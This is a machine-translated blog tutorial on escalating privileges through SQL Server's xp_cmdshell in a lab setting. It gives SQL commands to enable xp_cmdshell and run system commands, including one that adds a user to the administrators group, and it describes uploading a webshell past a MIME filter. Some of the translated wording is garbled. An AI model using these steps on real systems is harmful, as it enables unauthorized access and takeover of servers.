当前位置:网站首页>110. Network security penetration test - [privilege promotion 8] - [windows sqlserver xp_cmdshell stored procedure authorization]

110. Network security penetration test - [privilege promotion 8] - [windows sqlserver xp_cmdshell stored procedure authorization]

2022-07-07 11:56:00 qwsn

In my submission , Whether studying safety or engaging in safety , More or less, I have some feelings and sense of mission !!!

One 、Windows Sqlserver xp_cmdshell Stored procedure Authorization

1、XP_CMDSHELL Background of power raising :

        If the database used in the website is sqlserver So if you find sa Password , Can be opened xp_cmdshell stored procedure , With sqlserver Execute system commands as . But not necessarily the system permissions , It also depends on the administrator installing at the beginning sqlserver Permission settings for .

2、XP_CMDSHELL Relevant concepts :

(1)xp_cmdshell stored procedure 【 The stored procedure is : One or more that have been precompiled into an executable procedure SQL Collection of statements 】, It is used to execute this machine cmd Ordered , System login required sa jurisdiction . By default ,sql server2005/2008 After installation ,xp_cmdshell Stored procedures are disabled , If you want to use it , You can turn on :Exec sp_configure ‘show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;`

Serial number command notes
1Exec sp_configure ‘show advanced options’,1;# Allow configuration of advanced options
2RECONFIGURE;# Reconfiguration
3EXEC sp_configure ‘xp_cmdshell’,1;# Enable xp_cmdshell stored procedure
4RECONFIGURE;# Reconfiguration

(2) Execute system command format :

Serial number command notes
1Exec master.dbo.xp_cmdshell ‘whoami’# View the current user
2Exec master.dbo.xp_cmdshell ‘net user’# View all users
3Exec master.dbo.xp_cmdshell ‘systeminfo’# see OS Information
4Exec master.dbo.xp_cmdshell ‘net user test 123 /add & net localgroup administrators test /add’# Add administrator group user

(3) Disable it after use :Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE;

Serial number command notes
1Exec sp_configure ‘show advanced options’,1;# Allow configuration of advanced options
2RECONFIGURE;# Reconfiguration
3EXEC sp_configure ‘xp_cmdshell’,0;# Ban xp_cmdshell stored procedure
4RECONFIGURE;# Reconfiguration

3、XP_CMDSHELL The actual battle of raising power :

(1) Experimental environment :

1. Target environment :
(1) virtual machine Windows2008【target_sys.com】【192.168.97.131】
(2) Scripting language environment :php/asp The language environment exists 

2. attack :
(1) virtual machine Win7【192.168.97.130】
(2)Firefox+Burpsuite+ Ant sword + Malaysia 

3. The network environment :
(1)VMware Built NAT The Internet 

(3) Target link :

URL:http://target_sys.com/upload.php

(3) Experimental process :

First step : Visit the target link , utilize MIME Break through the type limit of the white list , Upload up.aspx Malaysia
 Insert picture description here
【 The above process is a little 】 The following is the right raising process :

The second step : Connect up.aspx Malaysia 【 The password for admin】, And click [File Manager] File management module , Search for sqlserver The account number and password of

Connecting Malaysia :
 Insert picture description here

sqlserver The general storage location of the connection data :web.config、config.asp、conn.aspx、database.aspx, But the environment is really sidelined (www.demo1.com) Under the index.aspx Memory stores as User password :123456
 Insert picture description here

The third step : Click on [DataBase] Database module , Use the just obtained sa Account connection mssql, Simultaneous discovery SQL SERVER Version is 2008

xp_cmdshell Stored procedures are used to execute native cmd Ordered , System login required sa jurisdiction
 Insert picture description here

Step four :SQLExec Select from the drop-down box Add xp_cmdshell(SQL2005) This option , Turn on xp_cmdshell stored procedure
 Insert picture description here
 Insert picture description here
Step five : Use the just launched xp_cmdshell stored procedure , With sqlserver To execute some system commands as

Because viewing the current permission is also an ordinary user , So you can only execute some basic commands , You can also upload the overflow right lifting tool Then improve the permissions of the current user .
 Insert picture description here
 Insert picture description here
 Insert picture description here

原网站

版权声明
本文为[qwsn]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/188/202207070958140490.html

随机推荐